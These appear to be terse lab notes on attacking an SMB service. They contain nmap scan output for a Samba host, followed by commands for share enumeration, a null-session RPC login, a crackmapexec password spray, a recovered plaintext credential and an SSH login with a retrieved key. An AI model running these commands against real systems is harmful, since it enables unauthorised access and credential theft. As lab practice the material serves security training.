Attacking SMB

May 21, 2024

# Nmap 7.94 scan initiated Wed May 22 13:28:36 2024 as: nmap -sC -sV -oN nmap-smb -p 445 -vv 10.129.251.246
Nmap scan report for 10.129.251.246
Host is up, received conn-refused (0.32s latency).
Scanned at 2024-05-22 13:28:36 PST for 14s

PORT    STATE SERVICE     REASON  VERSION
445/tcp open  netbios-ssn syn-ack Samba smbd 4.6.2

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| nbstat: NetBIOS name: ATTCSVC-LINUX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
|   ATTCSVC-LINUX<00>    Flags: <unique><active>
|   ATTCSVC-LINUX<03>    Flags: <unique><active>
|   ATTCSVC-LINUX<20>    Flags: <unique><active>
|   WORKGROUP<00>        Flags: <group><active>
|   WORKGROUP<1e>        Flags: <group><active>
| Statistics:
|   00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
|   00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
|_  00:00:00:00:00:00:00:00:00:00:00:00:00:00
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 10995/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 62584/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 52666/udp): CLEAN (Failed to receive data)
|   Check 4 (port 24096/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-time: 
|   date: 2024-05-22T05:28:54
|_  start_date: N/A
|_clock-skew: 7s

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed May 22 13:28:50 2024 -- 1 IP address (1 host up) scanned in 14.06 seconds

smbclient -L 10.129.251.246
smbclient \\\\10.129.251.246\\GGJ
smbmap -H 10.129.251.246 -r GGJ
rpcclient -U'%' 10.129.251.246
poetry run crackmapexec smb 10.129.251.246 -u users.list -p pws.list --local-auth
jason:34c8zuNBo91!@28Bszh
smbclient -U jason \\\\10.129.251.246\\GGJ
chmod 600 id_rsa
ssh -i id_rsa john@IP
